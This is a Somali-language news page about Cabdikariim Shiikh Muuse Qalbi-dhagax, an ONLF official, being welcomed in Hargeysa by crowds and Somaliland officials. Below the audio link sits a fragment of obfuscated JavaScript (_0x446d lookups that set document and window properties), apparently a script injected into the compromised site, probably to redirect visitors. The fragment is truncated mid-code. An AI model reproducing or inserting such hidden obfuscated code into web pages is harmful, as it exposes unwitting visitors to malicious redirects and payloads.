Saturday, June 27, 2026
HomeDhageysiSawirro+ Dhageyso:- Qalbi Dhagax Oo Maanta Lagu Soo Dhaweeyey Hargeysa

Sawirro+ Dhageyso:- Qalbi Dhagax Oo Maanta Lagu Soo Dhaweeyey Hargeysa

Cabdikariim Shiikh Muuse Qalbi-dhagax oo kamid ah saraakiisha ONLF ayaa Maanta gaaray magaalada Hargeysa ee xarunta Somaliland.

Qalbi-dhagax ayaa soo dhoweyn baraalan loogu sameeyay magaalada Hargeysa uu oo gaaray goordhow.

Dadweyne xiran calanka Soomaalida Itoobiya ayaa soo dhoweysay Cabdikariim Shiikh Muuse Qalbi-dhagax, sidoo kale soo dhoweynta waxaa ka qeyb galay masuuliyiin ka tirsan maamulka Somaliland iyo xisbiyada mucaaradka.

Masa��uuliyiin Ka Tirsan Xukuumadda Iyo Xisbiyada Soomaaliland Isla-markaana Soo dhweynta Qayb Ka Ahaa Oo war-baahinta Kula Hadlay Gudaha Garoonka Diyaaradaha Ee Cigaal ayaa Sheegay In Qalbi Dhagax Yahay Halgame Soomaaliyeed.

Sidoo kale Cabdikariim Qalbi-dhagax oo Isna la hadlay warbaahinta ayaa ka mahad ciliyay soo dhoweynta loo sameeyay, isaga oo sheegay in uu ku faraxsan yahay imaatinka uu yimid Hargeysa.

Waxaa uu sheegay in sidoo kale xubno ka tirsan ONLF ay Hargeysa iman doonaan isla-markaana Sida Ugu Dhaqsiyaha Badan usoo Booqan Doonaan dhammaan Deeganada Soomaaliland.

 

Hoos ka Dhageyso Codadka Soo Dhaweynta Cabdi Kariim Sheekh Muuse Qalbi Dhagax:-

00000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe